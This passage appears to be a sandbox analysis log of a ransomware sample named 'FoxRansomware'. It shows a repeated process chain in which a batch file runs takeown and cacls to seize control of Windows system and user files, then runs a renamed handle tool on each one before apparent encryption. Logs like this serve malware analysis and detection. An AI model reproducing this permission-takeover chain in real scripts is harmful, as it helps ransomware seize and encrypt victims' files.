C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵PID:5572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:5404
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:4356
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵
- Modifies file permissions
PID:5840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵PID:4140
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:5952
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:5604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵PID:2464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "behavior.xml" -nobanner3⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "behavior.xml" -nobanner4⤵PID:5344
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:360
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:6036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵PID:4908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵PID:5256
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""2⤵PID:5484
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C3⤵PID:5836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"3⤵PID:6032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner3⤵PID:5496
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner4⤵PID:4248
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""2⤵PID:5900
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C3⤵PID:4200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"3⤵PID:1404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner3⤵PID:5780
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner4⤵PID:5480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""2⤵PID:700
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C3⤵PID:5488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"3⤵
- Modifies file permissions
PID:5180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "RoamingCredentialSettings.xml" -nobanner3⤵PID:2032
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "RoamingCredentialSettings.xml" -nobanner4⤵PID:3828
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""2⤵PID:1340
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C3⤵PID:4796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"3⤵PID:5476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner3⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner4⤵PID:4736
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""2⤵PID:308
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C3⤵PID:668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"3⤵
- Modifies file permissions
PID:5984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner3⤵PID:5340
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner4⤵PID:3104
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""2⤵PID:3292
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C3⤵PID:2480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"3⤵PID:4204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftWordpad.xml" -nobanner3⤵PID:5592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftWordpad.xml" -nobanner4⤵PID:544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:5860
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:2952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:5872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "superbar.png" -nobanner3⤵PID:3532
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "superbar.png" -nobanner4⤵PID:1048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:624
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:5344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵PID:6016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵PID:1040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.e6640788-2798-4454-80d8-28088404c50e.1.etl""2⤵PID:3696
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.e6640788-2798-4454-80d8-28088404c50e.1.etl" /E /G Admin:F /C3⤵PID:3464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.e6640788-2798-4454-80d8-28088404c50e.1.etl"3⤵
- Modifies file permissions
PID:856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MoUsoCoreWorker.e6640788-2798-4454-80d8-28088404c50e.1.etl" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MoUsoCoreWorker.e6640788-2798-4454-80d8-28088404c50e.1.etl" -nobanner4⤵PID:4400
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""2⤵PID:2744
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C3⤵PID:5864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"3⤵PID:4248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftLync2010.xml" -nobanner3⤵PID:4264
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftLync2010.xml" -nobanner4⤵PID:4328
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5484
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""2⤵PID:4336
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C3⤵PID:5928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"3⤵PID:5480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner3⤵PID:6084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner4⤵PID:720
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""2⤵PID:5516
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C3⤵PID:3808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"3⤵
- Modifies file permissions
PID:3040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner3⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner4⤵PID:700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:4796
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:1600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵PID:1340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:1396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:1316
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.e36a78df-3242-4e6f-ad87-f121f8cb94a2.1.etl""2⤵PID:4492
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.e36a78df-3242-4e6f-ad87-f121f8cb94a2.1.etl" /E /G Admin:F /C3⤵PID:5912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.e36a78df-3242-4e6f-ad87-f121f8cb94a2.1.etl"3⤵PID:308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "WuProvider.e36a78df-3242-4e6f-ad87-f121f8cb94a2.1.etl" -nobanner3⤵PID:4000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "WuProvider.e36a78df-3242-4e6f-ad87-f121f8cb94a2.1.etl" -nobanner4⤵PID:3504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm""2⤵PID:1580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm" /E /G Admin:F /C3⤵PID:5316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm"3⤵PID:2216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "ActivitiesCache.db-shm" -nobanner3⤵PID:3192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "ActivitiesCache.db-shm" -nobanner4⤵PID:5452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:5744
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:5624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:4140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "overlay.png" -nobanner3⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "overlay.png" -nobanner4⤵PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:4324
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:2188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵PID:5012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵PID:3584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.4fb6fa58-450c-4446-a093-213ebe35d29c.1.etl""2⤵PID:5548
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.4fb6fa58-450c-4446-a093-213ebe35d29c.1.etl" /E /G Admin:F /C3⤵PID:5156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.4fb6fa58-450c-4446-a093-213ebe35d29c.1.etl"3⤵
- Modifies file permissions
PID:6036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "WuProvider.4fb6fa58-450c-4446-a093-213ebe35d29c.1.etl" -nobanner3⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "WuProvider.4fb6fa58-450c-4446-a093-213ebe35d29c.1.etl" -nobanner4⤵PID:3488
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""2⤵PID:2080
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C3⤵PID:5208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"3⤵
- Modifies file permissions
PID:4684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner3⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner4⤵PID:5908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""2⤵PID:3560
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C3⤵PID:5408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"3⤵PID:2992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner3⤵PID:1404
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner4⤵PID:5464
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""2⤵PID:4388
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C3⤵PID:5440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"3⤵PID:420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner3⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner4⤵PID:5476
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""2⤵PID:5824
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C3⤵PID:4920
-
-
